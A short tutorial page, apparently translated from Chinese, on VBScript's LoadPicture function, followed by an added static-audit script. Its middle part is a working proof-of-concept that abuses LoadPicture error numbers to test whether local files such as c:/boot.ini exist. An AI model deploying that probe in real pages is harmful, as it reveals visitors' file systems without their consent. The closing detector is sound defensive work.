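The VBScript LoadPicture function can read some information about a local image. It has a vulnerability, however, so it is fine for study and discussion but not recommended for use.
Example:
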
```html
<title>LoadPicture函數</title>
<form name="frm">
選擇圖片<input type="file" name="pic" onChange="GetPicInfor()">
</form>
<script language="vbscript">
Sub GetPicInfor()
    Dim objpic, iWidth, iHeight
    Dim pictype, picpath
    picpath = document.frm.pic.value
    Set objpic = LoadPicture(picpath)
    ' Width and Height are in HIMETRIC units; 26.4583 units per pixel
    iWidth = Round(objpic.Width / 26.4583)
    iHeight = Round(objpic.Height / 26.4583)
    ' Map the numeric picture type to a readable name
    Select Case objpic.Type
        Case 0
            pictype = "None"
        Case 1
            pictype = "Bitmap"
        Case 2
            pictype = "Metafile"
        Case 3
            pictype = "Icon"
        Case 4
            pictype = "Win32-enhanced metafile"
    End Select
    document.write "你選擇了圖片" & picpath
    document.write "<li>長度:" & iHeight & "</li>"
    document.write "<li>寬度:" & iWidth & "</li>"
    document.write "<li>類型:" & pictype & "</li>"
End Sub
</script>
```

However, this function has a vulnerability: it can be used to probe for file names that exist on the computer. The vulnerability dates from 2004 and Microsoft still has not patched it. Example:
```html
<form onsubmit="doIt(this);return false">
<input name="filename" value="c:/boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
Sub loadIt(filename)
    LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
    // Declared locally so a call that raises no error does not read an
    // undefined variable or reuse the value from a previous call.
    var result = 0;
    try {
        loadIt(form.filename.value);
    } catch (e) {
        result = e.number;
    }
    // -2146827856 is the error number raised when the file is missing;
    // any other outcome means the path exists.
    if (result != -2146827856) {
        alert('file exists');
    } else {
        alert('file does not exist');
    }
}
</script>
```
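
When auditing legacy intranet pages or proxied content, the pattern above (a VBScript `LoadPicture` call on a non-literal path, combined with script that reads the error number) can be flagged statically. The following is an added example, not code from the original page; the function names, rule names and sample pages are constructed, and the `.number` check is a heuristic.

```javascript
// Added example: static audit for the LoadPicture file-probing pattern.
// Function names, rule names and sample pages are constructed for illustration.

// Bodies of <script> blocks whose attributes match `attrRe` (all blocks if omitted).
function scriptBodies(html, attrRe = /(?:)/) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  const out = [];
  for (const m of html.matchAll(re)) {
    if (attrRe.test(m[1])) out.push(m[2]);
  }
  return out;
}

function auditLoadPicture(html) {
  const findings = [];
  for (const body of scriptBodies(html, /vbs/i)) {
    // Drop VBScript comments (apostrophe at line start or after whitespace).
    const code = body.replace(/(^|\s)'[^\r\n]*/gm, '$1');
    for (const m of code.matchAll(/\bLoadPicture\s*\(?\s*([^)\r\n]*)/gi)) {
      const arg = m[1].trim();
      const literal = /^"[^"]*"$/.test(arg);
      findings.push({ rule: literal ? 'literal-path' : 'dynamic-path', arg });
    }
  }
  // A dynamic path only becomes an existence oracle if the page also inspects
  // the error number of the failed call, as the probing page does with e.number.
  const readsErrNumber = scriptBodies(html).some((b) => /\.number\b/i.test(b));
  if (readsErrNumber && findings.some((f) => f.rule === 'dynamic-path')) {
    findings.push({ rule: 'error-number-oracle', arg: '' });
  }
  return findings;
}

// Constructed sample pages.
const PROBE_PAGE = `
<script language="vbscript">
Sub loadIt(filename)
  LoadPicture(filename)
End Sub
</script>
<script language="javascript">
try { loadIt(path); } catch (e) { result = e.number; }
</script>`;
const BENIGN_PAGE = `<script language="vbscript">
' LoadPicture(userInput) is not used here
Set logo = LoadPicture("logo.bmp")
</script>`;

const rules = (html) => auditLoadPicture(html).map((f) => f.rule).join(',');
console.log(rules(PROBE_PAGE), '|', rules(BENIGN_PAGE));
```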